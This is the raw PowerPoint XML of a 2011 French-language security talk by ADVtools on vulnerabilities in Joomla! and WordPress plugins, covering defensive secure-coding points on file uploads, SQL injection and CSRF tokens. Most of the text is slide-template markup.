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98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21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8" r:id="rId61"/>
    <p:sldId id="422" r:id="rId62"/>
    <p:sldId id="419" r:id="rId63"/>
    <p:sldId id="420" r:id="rId64"/>
    <p:sldId id="295" r:id="rId65"/>
    <p:sldId id="297" r:id="rId6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x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C6D7ED"/>
    <a:srgbClr val="FF3333"/>
    <a:srgbClr val="FBFBFB"/>
    <a:srgbClr val="FF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97BBE-D6BC-490B-BCB8-20B948F6DEFE}" type="datetimeFigureOut">
              <a:rPr lang="fr-CH" smtClean="0"/>
              <a:t>11.02.2011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FE1A5-BF17-4659-9205-B06B09547C68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39943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396C2-AF94-4CD7-97DB-D7249674BAC1}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>11/02/2011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16C21-A40B-4305-A99C-EB338B796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3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Partiel et contestable: injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" baseline="0" dirty="0" smtClean="0"/>
              <a:t> SQL de 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" baseline="0" dirty="0" smtClean="0"/>
              <a:t> ordre. Pas un mot.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EBD2-F1B4-4F98-BFD2-07BEAA6431E1}" type="slidenum">
              <a:rPr lang="fr-CH" smtClean="0"/>
              <a:t>13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2787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Partiel et contestable: injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" baseline="0" dirty="0" smtClean="0"/>
              <a:t> SQL de 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" baseline="0" dirty="0" smtClean="0"/>
              <a:t> ordre. Pas un mot.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EBD2-F1B4-4F98-BFD2-07BEAA6431E1}" type="slidenum">
              <a:rPr lang="fr-CH" smtClean="0"/>
              <a:t>22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2787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Initié</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" baseline="0" dirty="0" smtClean="0"/>
              <a:t> par la Deutch Bank avec des Universités. Version 2.0 hostée par l’Université de </a:t>
            </a:r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Duisburg.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EBD2-F1B4-4F98-BFD2-07BEAA6431E1}" type="slidenum">
              <a:rPr lang="fr-CH" smtClean="0"/>
              <a:t>51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204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noProof="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH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noProof="0" smtClean="0"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH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smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH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noProof="0" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" noProof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00392" y="6067277"/>
            <a:ext cx="837456" cy="79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09320"/>
            <a:ext cx="442392" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="fr-CH" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{69C5922D-9CE9-4DAF-BDE8-72278C1EA405}" type="slidenum">
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-CH" noProof="0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043608" y="6309320"/>
            <a:ext cx="6984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noProof="0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noProof="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH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noProof="0" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" noProof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00392" y="6067277"/>
            <a:ext cx="837456" cy="79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09320"/>
            <a:ext cx="442392" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="fr-CH" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{69C5922D-9CE9-4DAF-BDE8-72278C1EA405}" type="slidenum">
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-CH" noProof="0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043608" y="6309320"/>
            <a:ext cx="6984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noProof="0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noProof="0" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" noProof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00392" y="6067277"/>
            <a:ext cx="837456" cy="79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CH" noProof="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH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09320"/>
            <a:ext cx="442392" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="fr-CH" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{69C5922D-9CE9-4DAF-BDE8-72278C1EA405}" type="slidenum">
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-CH" noProof="0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043608" y="6309320"/>
            <a:ext cx="6984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noProof="0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noProof="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="fr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noProof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smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH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noProof="0" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH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noProof="0" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" noProof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00392" y="6067277"/>
            <a:ext cx="837456" cy="79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09320"/>
            <a:ext cx="442392" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="fr-CH" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{69C5922D-9CE9-4DAF-BDE8-72278C1EA405}" type="slidenum">
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-CH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043608" y="6309320"/>
            <a:ext cx="6984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noProof="0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noProof="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="fr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noProof="0" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH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noProof="0" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" noProof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00392" y="6067277"/>
            <a:ext cx="837456" cy="79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67544" y="6309320"/>
            <a:ext cx="442392" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="fr-CH" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{69C5922D-9CE9-4DAF-BDE8-72278C1EA405}" type="slidenum">
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-CH" noProof="0" dirty="0"/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043608" y="6309320"/>
            <a:ext cx="6984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noProof="0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smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" noProof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00392" y="6067277"/>
            <a:ext cx="837456" cy="79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09320"/>
            <a:ext cx="442392" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="fr-CH" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{69C5922D-9CE9-4DAF-BDE8-72278C1EA405}" type="slidenum">
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-CH" noProof="0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043608" y="6309320"/>
            <a:ext cx="6984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noProof="0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00392" y="6067277"/>
            <a:ext cx="837456" cy="79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09320"/>
            <a:ext cx="442392" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="fr-CH" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{69C5922D-9CE9-4DAF-BDE8-72278C1EA405}" type="slidenum">
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-CH" noProof="0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043608" y="6309320"/>
            <a:ext cx="6984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noProof="0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noProof="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH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noProof="0" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr lang="fr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noProof="0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00392" y="6067277"/>
            <a:ext cx="837456" cy="79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09320"/>
            <a:ext cx="442392" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="fr-CH" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{69C5922D-9CE9-4DAF-BDE8-72278C1EA405}" type="slidenum">
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-CH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043608" y="6309320"/>
            <a:ext cx="6984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noProof="0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noProof="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH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noProof="0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00392" y="6067277"/>
            <a:ext cx="837456" cy="79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09320"/>
            <a:ext cx="442392" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="fr-CH" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{69C5922D-9CE9-4DAF-BDE8-72278C1EA405}" type="slidenum">
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-CH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043608" y="6309320"/>
            <a:ext cx="6984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noProof="0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noProof="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="fr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noProof="0" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH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yptool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ordpress.org/extend/plugins/exploit-scanner/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://codex.wordpress.org/Hardening_WordPress" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.netobservatory.ch/report/pdf/NetObs_Report_01.12.20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joomla.org/Secure_coding_guidelines" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://codex.wordpress.org/Data_Validation" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.slideshare.net/markjaquith/secure-coding-with-wordpress-wordcamp-sf-2008-presentation-559310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yptool.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://switch.dl.sourceforge.net/project/owasp/Guide/2.0.1/OWASPGuide2.0.1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mailto:sebastien@advtools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flora@advtools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hyperlink" Target="http://www.advtools.com/blo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340768"/>
            <a:ext cx="4248472" cy="2736304"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" sz="3200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter meeting</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-CH" sz="3200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-CH" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>17 février 2011</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-CH" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-CH" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>@ HEIG-VD Yverdon-Les-Bains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="3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CH" sz="3200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="fr-CH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4653136"/>
            <a:ext cx="6444208" cy="1536576"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="C6D7ED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algn="l"/>
            <a:r>
              <a:rPr lang="fr-CH" sz="3000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0-days: le diable se cache dans les plug-ins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-CH" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-CH" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Durée: 45 minutes</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="fr-CH" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="fr-CH" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flora Bottaccio, Sebastien Andrivet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="fr-CH" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ADVtools SARL (Genève, Suisse)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/>
          <a:srcRect t="-8828"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5004048" y="188640"/>
            <a:ext cx="2376264" cy="82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AutoShape 2" descr="http://static.panoramio.com/photos/original/583648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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8196" name="AutoShape 4" descr="http://static.panoramio.com/photos/original/583648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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17" descr="heig-vd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79512" y="260648"/>
            <a:ext cx="4128458" cy="3096344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474092" y="0"/>
            <a:ext cx="1648802" cy="155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41" y="5545539"/>
            <a:ext cx="1676400" cy="640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Joomla!: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Téléchargement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t>(upload)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Le framework peut aider (un peu):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>JFile:makeSafe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>JPath::clean</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>JFile::upload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Mais c’est au développeur d’ajouter le bon code au bon endroit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Il est très facile de faire des erreurs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10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49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Joomla!: Injections </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>SQL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JRequest ne peut pas vous aider</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>MySQL permet les procédures stockées, mais à partir de la version 5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Joomla! n’utilise ni les procédures stockées ni les requêtes paramétrées</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Tout le travail est laissé au développeur. A part les recommandations du Secure Coding Guide, il n’y a rien.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-CH" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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11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198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Joomla!: Cross-Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Request Forgery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Système de jeton</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Les jetons sont gérés par Joomla! mais c’est au développeur d’ajouter le bon code au bon endroit:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t>echo JHTML::_( 'form.token' );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JRequest::checkToken();</a:t>
            </a:r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12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856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Joomla! - En résumé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Le Secure Coding Guide est un bon point de départ. Mais il est court, partiel et contestable sur certaines recommandations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Joomla! fournit quelques API pour sécuriser, mais rien n’est automatique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Quasiment rien pour l’injection SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>L’équipe de Joomla! a fait un réel effort pour Joomla! lui-même. Mais quand est-il des plug-ins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13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639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WordPress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CMS libre et open source (GNU GPL)</a:t>
            </a:r>
          </a:p>
          <a:p>
